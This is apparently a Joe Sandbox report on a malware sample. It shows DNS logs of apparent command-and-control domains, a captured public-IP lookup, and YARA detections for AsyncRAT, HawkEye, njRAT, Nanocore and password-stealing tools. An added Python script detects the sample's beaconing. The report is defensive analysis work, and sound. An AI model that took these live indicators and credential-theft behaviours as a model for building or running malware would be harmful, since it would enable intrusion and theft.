Mar 8, 2022 18:01:02.421529055 CET | 192.168.2.6 | 8.8.8.8 | 0xf287 | Standard query (0) | gfhhjgh.duckdns.org | A (IP address) | IN (0x0001)
Mar 8, 2022 18:01:21.131813049 CET | 192.168.2.6 | 8.8.8.8 | 0x6641 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
Mar 8, 2022 18:01:29.731457949 CET | 192.168.2.6 | 8.8.8.8 | 0xd006 | Standard query (0) | gfhhjgh.duckdns.org | A (IP address) | IN (0x0001)
Mar 8, 2022 18:01:52.253196955 CET | 192.168.2.6 | 8.8.8.8 | 0xa2d | Standard query (0) | kazya1.hopto.org | A (IP address) | IN (0x0001)
Mar 8, 2022 18:01:56.196608067 CET | 192.168.2.6 | 8.8.8.8 | 0xf35b | Standard query (0) | gfhhjgh.duckdns.org | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:29.062084913 CET | 192.168.2.6 | 8.8.8.8 | 0xb207 | Standard query (0) | gfhhjgh.duckdns.org | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:48.149482012 CET | 192.168.2.6 | 8.8.8.8 | 0x541d | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:48.414717913 CET | 192.168.2.6 | 8.8.8.8 | 0x771c | Standard query (0) | kazya1.hopto.org | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:48.427118063 CET | 192.168.2.6 | 8.8.8.8 | 0x1458 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:48.514926910 CET | 192.168.2.6 | 8.8.8.8 | 0x249f | Standard query (0) | yabynennet.xyz | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:49.711517096 CET | 192.168.2.6 | 8.8.8.8 | 0x1de0 | Standard query (0) | 123.105.12.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Mar 8, 2022 18:02:50.793032885 CET | 192.168.2.6 | 8.8.8.8 | 0x2c | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:50.939651012 CET | 192.168.2.6 | 8.8.8.8 | 0x1b81 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:51.056174994 CET | 192.168.2.6 | 8.8.8.8 | 0xa95e | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:52.364578009 CET | 192.168.2.6 | 8.8.8.8 | 0x658b | Standard query (0) | prepepe.ac.ug | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:52.476210117 CET | 192.168.2.6 | 8.8.8.8 | 0xb173 | Standard query (0) | prepepe.ac.ug | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:52.577049971 CET | 192.168.2.6 | 8.8.8.8 | 0xc570 | Standard query (0) | prepepe.ac.ug | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:52.879266024 CET | 192.168.2.6 | 8.8.8.8 | 0x28df | Standard query (0) | prepepe.ac.ug | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:53.016813040 CET | 192.168.2.6 | 8.8.8.8 | 0x7f0c | Standard query (0) | prepepe.ac.ug | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:53.111742973 CET | 192.168.2.6 | 8.8.8.8 | 0x73f9 | Standard query (0) | prepepe.ac.ug | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:53.250925064 CET | 192.168.2.6 | 8.8.8.8 | 0x59e3 | Standard query (0) | prepepe.ac.ug | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:53.351939917 CET | 192.168.2.6 | 8.8.8.8 | 0x1e6 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:54.809392929 CET | 192.168.2.6 | 8.8.8.8 | 0x5dd4 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:54.902901888 CET | 192.168.2.6 | 8.8.8.8 | 0x4a0c | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:55.664746046 CET | 192.168.2.6 | 8.8.8.8 | 0xd501 | Standard query (0) | gfhhjgh.duckdns.org | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:55.762953997 CET | 192.168.2.6 | 8.8.8.8 | 0x259d | Standard query (0) | pretorian.ac.ug | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:55.837884903 CET | 192.168.2.6 | 8.8.8.8 | 0x66da | Standard query (0) | pretorian.ac.ug | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:55.930027962 CET | 192.168.2.6 | 8.8.8.8 | 0x349d | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:56.465817928 CET | 192.168.2.6 | 8.8.8.8 | 0xa4a5 | Standard query (0) | 22ssh.com | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:56.742223978 CET | 192.168.2.6 | 8.8.8.8 | 0xeaa | Standard query (0) | pool.usa-138.com | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:58.431301117 CET | 192.168.2.6 | 8.8.8.8 | 0x8329 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:00.852693081 CET | 192.168.2.6 | 8.8.8.8 | 0x4b12 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:03.026786089 CET | 192.168.2.6 | 8.8.8.8 | 0x131b | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:05.181277037 CET | 192.168.2.6 | 8.8.8.8 | 0xff00 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:07.321696043 CET | 192.168.2.6 | 8.8.8.8 | 0xd5e2 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:09.462516069 CET | 192.168.2.6 | 8.8.8.8 | 0x8118 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:11.455007076 CET | 192.168.2.6 | 8.8.8.8 | 0x9cb7 | Standard query (0) | files.000webhost.com | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:11.667885065 CET | 192.168.2.6 | 8.8.8.8 | 0x6983 | Standard query (0) | kazya1.hopto.org | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:11.855283022 CET | 192.168.2.6 | 8.8.8.8 | 0x9062 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:13.742429972 CET | 192.168.2.6 | 8.8.8.8 | 0x204b | Standard query (0) | 22ssh.com | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:13.962951899 CET | 192.168.2.6 | 8.8.8.8 | 0xd1b5 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:16.135138988 CET | 192.168.2.6 | 8.8.8.8 | 0xcac2 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:18.356760979 CET | 192.168.2.6 | 8.8.8.8 | 0x9ff | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:20.463649035 CET | 192.168.2.6 | 8.8.8.8 | 0xa314 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:21.935733080 CET | 192.168.2.6 | 8.8.8.8 | 0x52d3 | Standard query (0) | gfhhjgh.duckdns.org | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:23.130189896 CET | 192.168.2.6 | 8.8.8.8 | 0xecc7 | Standard query (0) | hackerinvasion.f3322.net | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:23.273044109 CET | 192.168.2.6 | 8.8.8.8 | 0xc444 | Standard query (0) | pool.usa-138.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Mar 8, 2022 18:00:25.247078896 CET | 8.8.8.8 | 192.168.2.6 | 0x72ed | No error (0) | store-images.s-microsoft.com | store-images.s-microsoft.com-c.edgekey.net | - | CNAME (Canonical name) | IN (0x0001)
Mar 8, 2022 18:01:02.530765057 CET | 8.8.8.8 | 192.168.2.6 | 0xf287 | No error (0) | gfhhjgh.duckdns.org | - | 179.13.1.253 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:01:21.159094095 CET | 8.8.8.8 | 192.168.2.6 | 0x6641 | No error (0) | api.ipify.org | api.ipify.org.herokudns.com | - | CNAME (Canonical name) | IN (0x0001)
Mar 8, 2022 18:01:21.159094095 CET | 8.8.8.8 | 192.168.2.6 | 0x6641 | No error (0) | api.ipify.org.herokudns.com | - | 52.20.78.240 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:01:21.159094095 CET | 8.8.8.8 | 192.168.2.6 | 0x6641 | No error (0) | api.ipify.org.herokudns.com | - | 3.232.242.170 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:01:21.159094095 CET | 8.8.8.8 | 192.168.2.6 | 0x6641 | No error (0) | api.ipify.org.herokudns.com | - | 3.220.57.224 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:01:21.159094095 CET | 8.8.8.8 | 192.168.2.6 | 0x6641 | No error (0) | api.ipify.org.herokudns.com | - | 54.91.59.199 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:01:29.841167927 CET | 8.8.8.8 | 192.168.2.6 | 0xd006 | No error (0) | gfhhjgh.duckdns.org | - | 179.13.1.253 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:01:52.276662111 CET | 8.8.8.8 | 192.168.2.6 | 0xa2d | No error (0) | kazya1.hopto.org | - | 41.249.51.34 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:01:56.216669083 CET | 8.8.8.8 | 192.168.2.6 | 0xf35b | No error (0) | gfhhjgh.duckdns.org | - | 179.13.1.253 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:29.169253111 CET | 8.8.8.8 | 192.168.2.6 | 0xb207 | No error (0) | gfhhjgh.duckdns.org | - | 179.13.1.253 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:48.436398029 CET | 8.8.8.8 | 192.168.2.6 | 0x771c | No error (0) | kazya1.hopto.org | - | 41.249.51.34 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:48.491530895 CET | 8.8.8.8 | 192.168.2.6 | 0x541d | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:48.538808107 CET | 8.8.8.8 | 192.168.2.6 | 0x249f | No error (0) | yabynennet.xyz | - | 45.129.99.212 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:48.738595963 CET | 8.8.8.8 | 192.168.2.6 | 0x1458 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:49.731496096 CET | 8.8.8.8 | 192.168.2.6 | 0x1de0 | Name error (3) | 123.105.12.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Mar 8, 2022 18:02:50.815732956 CET | 8.8.8.8 | 192.168.2.6 | 0x2c | No error (0) | whatismyipaddress.com | - | 104.16.154.36 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:50.815732956 CET | 8.8.8.8 | 192.168.2.6 | 0x2c | No error (0) | whatismyipaddress.com | - | 104.16.155.36 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:50.959239960 CET | 8.8.8.8 | 192.168.2.6 | 0x1b81 | No error (0) | whatismyipaddress.com | - | 104.16.154.36 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:50.959239960 CET | 8.8.8.8 | 192.168.2.6 | 0x1b81 | No error (0) | whatismyipaddress.com | - | 104.16.155.36 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:51.073822021 CET | 8.8.8.8 | 192.168.2.6 | 0xa95e | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:52.455807924 CET | 8.8.8.8 | 192.168.2.6 | 0x658b | Server failure (2) | prepepe.ac.ug | none | none | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:52.546967030 CET | 8.8.8.8 | 192.168.2.6 | 0xb173 | Server failure (2) | prepepe.ac.ug | none | none | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:52.664900064 CET | 8.8.8.8 | 192.168.2.6 | 0xc570 | Server failure (2) | prepepe.ac.ug | none | none | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:52.967892885 CET | 8.8.8.8 | 192.168.2.6 | 0x28df | Server failure (2) | prepepe.ac.ug | none | none | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:53.099018097 CET | 8.8.8.8 | 192.168.2.6 | 0x7f0c | Server failure (2) | prepepe.ac.ug | none | none | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:53.208043098 CET | 8.8.8.8 | 192.168.2.6 | 0x73f9 | Server failure (2) | prepepe.ac.ug | none | none | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:53.341078997 CET | 8.8.8.8 | 192.168.2.6 | 0x59e3 | Server failure (2) | prepepe.ac.ug | none | none | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:53.688494921 CET | 8.8.8.8 | 192.168.2.6 | 0x1e6 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:54.832865000 CET | 8.8.8.8 | 192.168.2.6 | 0x5dd4 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | - | CNAME (Canonical name) | IN (0x0001)
Mar 8, 2022 18:02:54.924410105 CET | 8.8.8.8 | 192.168.2.6 | 0x4a0c | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | - | CNAME (Canonical name) | IN (0x0001)
Mar 8, 2022 18:02:55.684472084 CET | 8.8.8.8 | 192.168.2.6 | 0xd501 | No error (0) | gfhhjgh.duckdns.org | - | 179.13.1.253 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:55.834017038 CET | 8.8.8.8 | 192.168.2.6 | 0x259d | Server failure (2) | pretorian.ac.ug | none | none | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:55.903019905 CET | 8.8.8.8 | 192.168.2.6 | 0x3236 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
Mar 8, 2022 18:02:55.939817905 CET | 8.8.8.8 | 192.168.2.6 | 0x66da | Server failure (2) | pretorian.ac.ug | none | none | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:56.227159977 CET | 8.8.8.8 | 192.168.2.6 | 0x349d | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:57.091926098 CET | 8.8.8.8 | 192.168.2.6 | 0xeaa | No error (0) | pool.usa-138.com | - | 220.86.85.75 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:02:58.743158102 CET | 8.8.8.8 | 192.168.2.6 | 0x8329 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:00.870723009 CET | 8.8.8.8 | 192.168.2.6 | 0x4b12 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:03.046681881 CET | 8.8.8.8 | 192.168.2.6 | 0x131b | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:05.199376106 CET | 8.8.8.8 | 192.168.2.6 | 0xff00 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:07.343290091 CET | 8.8.8.8 | 192.168.2.6 | 0xd5e2 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:09.787642956 CET | 8.8.8.8 | 192.168.2.6 | 0x8118 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:11.490103006 CET | 8.8.8.8 | 192.168.2.6 | 0x9cb7 | No error (0) | files.000webhost.com | us-east-1.route-1000.000webhost.awex.io | - | CNAME (Canonical name) | IN (0x0001)
Mar 8, 2022 18:03:11.490103006 CET | 8.8.8.8 | 192.168.2.6 | 0x9cb7 | No error (0) | us-east-1.route-1000.000webhost.awex.io | - | 145.14.144.149 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:11.689558983 CET | 8.8.8.8 | 192.168.2.6 | 0x6983 | No error (0) | kazya1.hopto.org | - | 41.249.51.34 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:11.875169992 CET | 8.8.8.8 | 192.168.2.6 | 0x9062 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:13.984797001 CET | 8.8.8.8 | 192.168.2.6 | 0xd1b5 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:16.157701969 CET | 8.8.8.8 | 192.168.2.6 | 0xcac2 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:18.376470089 CET | 8.8.8.8 | 192.168.2.6 | 0x9ff | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:20.481589079 CET | 8.8.8.8 | 192.168.2.6 | 0xa314 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:22.042737007 CET | 8.8.8.8 | 192.168.2.6 | 0x52d3 | No error (0) | gfhhjgh.duckdns.org | - | 179.13.1.253 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:23.148067951 CET | 8.8.8.8 | 192.168.2.6 | 0xecc7 | No error (0) | hackerinvasion.f3322.net | - | 127.0.0.1 | A (IP address) | IN (0x0001)
Mar 8, 2022 18:03:23.588294983 CET | 8.8.8.8 | 192.168.2.6 | 0xc444 | No error (0) | pool.usa-138.com | - | 220.86.85.75 | A (IP address) | IN (0x0001)
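The DNS tables above list raw queries and answers; the Python below is an added triage example and is not part of the Joe Sandbox report. It tags each queried name with the traits an analyst pulls out of these rows (dynamic-DNS provider, public-IP lookup service, failed resolution, answer pointing at loopback) and then looks for names that are re-queried at a steady cadence, which is how the polling of hackerinvasion.f3322.net and gfhhjgh.duckdns.org stands out from one-off lookups. The sample rows are transcribed from the tables above with the date dropped (every row is on Mar 8, 2022); the dynamic-DNS suffix list and the IP-check host list are assumptions chosen to cover what this sample contacted, not complete lists.

```python
import ipaddress
import statistics
from collections import defaultdict

# Constructed sample, transcribed from the DNS query/answer rows above. The report
# shows every row on Mar 8, 2022, so only the time is kept (assumption: one day).
# Fields: time | queried name | DNS reply code | answer address ('' when none).
SAMPLE_DNS = """\
18:01:02.421529055|gfhhjgh.duckdns.org|0|179.13.1.253
18:01:21.131813049|api.ipify.org|0|52.20.78.240
18:01:29.731457949|gfhhjgh.duckdns.org|0|179.13.1.253
18:01:56.196608067|gfhhjgh.duckdns.org|0|179.13.1.253
18:02:29.062084913|gfhhjgh.duckdns.org|0|179.13.1.253
18:02:48.149482012|hackerinvasion.f3322.net|0|127.0.0.1
18:02:48.427118063|hackerinvasion.f3322.net|0|127.0.0.1
18:02:50.793032885|whatismyipaddress.com|0|104.16.154.36
18:02:51.056174994|hackerinvasion.f3322.net|0|127.0.0.1
18:02:52.364578009|prepepe.ac.ug|2|
18:02:52.476210117|prepepe.ac.ug|2|
18:02:52.577049971|prepepe.ac.ug|2|
18:02:52.879266024|prepepe.ac.ug|2|
18:02:53.016813040|prepepe.ac.ug|2|
18:02:53.111742973|prepepe.ac.ug|2|
18:02:53.250925064|prepepe.ac.ug|2|
18:02:53.351939917|hackerinvasion.f3322.net|0|127.0.0.1
18:02:55.664746046|gfhhjgh.duckdns.org|0|179.13.1.253
18:02:55.930027962|hackerinvasion.f3322.net|0|127.0.0.1
18:02:58.431301117|hackerinvasion.f3322.net|0|127.0.0.1
18:03:00.852693081|hackerinvasion.f3322.net|0|127.0.0.1
18:03:03.026786089|hackerinvasion.f3322.net|0|127.0.0.1
18:03:05.181277037|hackerinvasion.f3322.net|0|127.0.0.1
18:03:07.321696043|hackerinvasion.f3322.net|0|127.0.0.1
18:03:09.462516069|hackerinvasion.f3322.net|0|127.0.0.1
18:03:11.855283022|hackerinvasion.f3322.net|0|127.0.0.1
18:03:13.962951899|hackerinvasion.f3322.net|0|127.0.0.1
18:03:16.135138988|hackerinvasion.f3322.net|0|127.0.0.1
18:03:18.356760979|hackerinvasion.f3322.net|0|127.0.0.1
18:03:20.463649035|hackerinvasion.f3322.net|0|127.0.0.1
18:03:21.935733080|gfhhjgh.duckdns.org|0|179.13.1.253
18:03:23.130189896|hackerinvasion.f3322.net|0|127.0.0.1
""".splitlines()

# Assumed lists (not from the report): dynamic-DNS suffixes and public-IP lookup
# services, chosen to match what this sample contacted.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "hopto.org", "f3322.net")
IP_CHECK_HOSTS = {"api.ipify.org", "whatismyipaddress.com", "api.ip.sb"}

def to_seconds(hms):
    # '18:02:48.149482012' -> seconds since midnight, sub-second part kept
    h, m, s = hms.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)

def parse(rows):
    # Yield (seconds, name, rcode, address-or-None) for each sample row
    for row in rows:
        ts, name, rcode, addr = row.split("|")
        yield to_seconds(ts), name, int(rcode), addr or None

def classify(name, rcode, addr):
    # Tags an analyst would pull from one answer row
    tags = set()
    if any(name == s or name.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES):
        tags.add("dynamic-dns")
    if name in IP_CHECK_HOSTS:
        tags.add("ip-check-service")
    if rcode != 0:
        tags.add("resolution-failed")
    if addr:
        ip = ipaddress.ip_address(addr)
        if ip.is_loopback:
            tags.add("loopback-answer")  # host parked on 127.0.0.1: traffic never leaves the box
        elif ip.is_private:
            tags.add("private-answer")
    return tags

def summarize(rows):
    # Union of tags per queried name
    tags = defaultdict(set)
    for _, name, rcode, addr in parse(rows):
        tags[name] |= classify(name, rcode, addr)
    return dict(tags)

def periodic_queries(rows, min_count=5, tolerance=0.25, min_fraction=0.8, min_interval=1.0):
    """Names re-queried at a steady cadence: {name: (median gap in s, share of
    gaps within tolerance of that median)}. Medians under min_interval are
    resolver retries (the SERVFAIL burst for prepepe.ac.ug), not polling."""
    by_name = defaultdict(list)
    for t, name, _, _ in parse(rows):
        by_name[name].append(t)
    found = {}
    for name, times in by_name.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        med = statistics.median(gaps)
        if med < min_interval:
            continue
        share = sum(abs(g - med) <= tolerance * med for g in gaps) / len(gaps)
        if share >= min_fraction:
            found[name] = (round(med, 3), round(share, 3))
    return found
```

Calling summarize(SAMPLE_DNS) tags hackerinvasion.f3322.net as both dynamic-dns and loopback-answer, and periodic_queries(SAMPLE_DNS) reports it re-queried about every 2.2 s (15 of 16 gaps within tolerance) and gfhhjgh.duckdns.org about every 27 s. The seven prepepe.ac.ug queries fall inside one second and are dropped by min_interval: sub-second repeats after a SERVFAIL are the stub resolver retrying, not the sample polling. The loopback answer means the sample's connection attempts to that host cannot leave the machine during this run, which is why the table shows the name resolving again and again with nothing behind it; the steady re-query is still a usable network indicator.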
• api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49770 | 52.20.78.240 | 80 | C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
Timestamp | kBytes transferred | Direction | Data
Mar 8, 2022 18:01:21.456914902 CET | 1230 | OUT | GET /?format=xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: api.ipify.org
Connection: Keep-Alive
Mar 8, 2022 18:01:21.597302914 CET | 1230 | IN | HTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Tue, 08 Mar 2022 17:01:21 GMT
Content-Length: 10
Via: 1.1 vegur
Data Raw: 38 34 2e 31 37 2e 35 32 2e 37
Data Ascii: 84.17.52.7


Target ID: 0
Start time: 18:00:31
Start date: 08/03/2022
Path: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe"
Imagebase: 0x9f0000
File size: 23633920 bytes
MD5 hash: 52867174362410D63215D78E708103EA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: Florian Roth
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
• Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: Florian Roth
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
